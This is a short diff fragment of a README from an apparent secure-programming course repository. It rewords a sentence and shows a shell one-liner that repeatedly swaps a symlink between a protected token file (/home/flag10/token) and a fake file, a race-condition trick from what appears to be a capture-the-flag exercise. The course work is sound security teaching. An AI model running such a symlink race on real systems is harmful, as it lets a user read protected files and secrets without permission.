marianoktm/SECPROG-Unisa/README.md

 done &
 ```

-Actually we can also write is as a one-liner:
+We can also write it as a one-liner:

 ```
 while true; do ln -sf /home/flag10/token /tmp/link; ln -sf /tmp/faketoken /tmp/link; done &